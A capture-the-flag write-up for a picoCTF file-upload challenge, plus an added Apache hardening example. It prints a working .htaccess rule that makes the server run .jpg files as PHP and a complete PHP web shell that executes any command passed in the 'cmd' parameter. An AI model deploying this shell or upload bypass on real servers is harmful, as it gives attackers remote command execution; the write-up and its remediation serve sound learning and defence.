by4ss3d

This challenge requires some uncommon knowledge about the .htaccess file and its misconfigurations. We're told from the very beginning that the only files accepted are the following ones:

  • Upload Image File (JPG, PNG, or GIF):

I tried to trick the system with files like exploit.jpg.php but nothing worked.

If we check the hints from picoCTF we get:

  • Apache can be tricked into executing non-PHP files as PHP with a .htaccess file.

After a little bit of research I realized that I could upload the .htaccess file (without any extension), practically setting a new rule for that directory (/upload.php).

.htaccess file:

AddType application/x-httpd-php .jpg

(meaning the system treats every .jpg file as a .php)

Then it goes without saying that I created a phpshell with the extension .jpg.

phpshell.jpg file:

<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php if(isset($_GET['cmd'])) { system($_GET['cmd'] . ' 2>&1'); } ?>
</pre>
</body>
</html>

With all of this I tricked the server into giving me a shell on the following path: /upload.php/images/phpshell.jpg (or something like that)

Then I located flag.txt by messing around with ls (it was in the ../.. directory).
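
The server-side setting that lets an uploaded .htaccess take effect, next to a corrected version, as an added example that is not part of the original writeup or the challenge's real configuration. The directory path and the use of mod_php are assumptions.

```apache
# Added hardening example. "/var/www/html/images" is an assumed upload
# directory, not a path taken from the challenge.

# Weak: per-directory overrides are honoured, so an uploaded .htaccess
# containing "AddType application/x-httpd-php .jpg" takes effect.
#<Directory "/var/www/html/images">
#    AllowOverride All
#</Directory>

# Corrected: uploads are served as static files only.
<Directory "/var/www/html/images">
    # Ignore every .htaccess below this directory, uploaded or not.
    AllowOverride None

    # No CGI execution and no directory listings for uploaded content.
    Options -ExecCGI -Indexes

    # Hand every request here to the static file handler instead of
    # whatever handler a MIME mapping would select.
    SetHandler default-handler

    # Assumes PHP runs as mod_php on PHP 8 (module file mod_php.c);
    # switches the interpreter off for this directory.
    <IfModule mod_php.c>
        php_admin_flag engine off
    </IfModule>

    # Refuse to serve .htaccess/.htpasswd-style files at all.
    <Files ".ht*">
        Require all denied
    </Files>
</Directory>
```

Storing uploads under server-generated names would additionally keep a file called .htaccess from ever landing in the directory.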


made by k0d
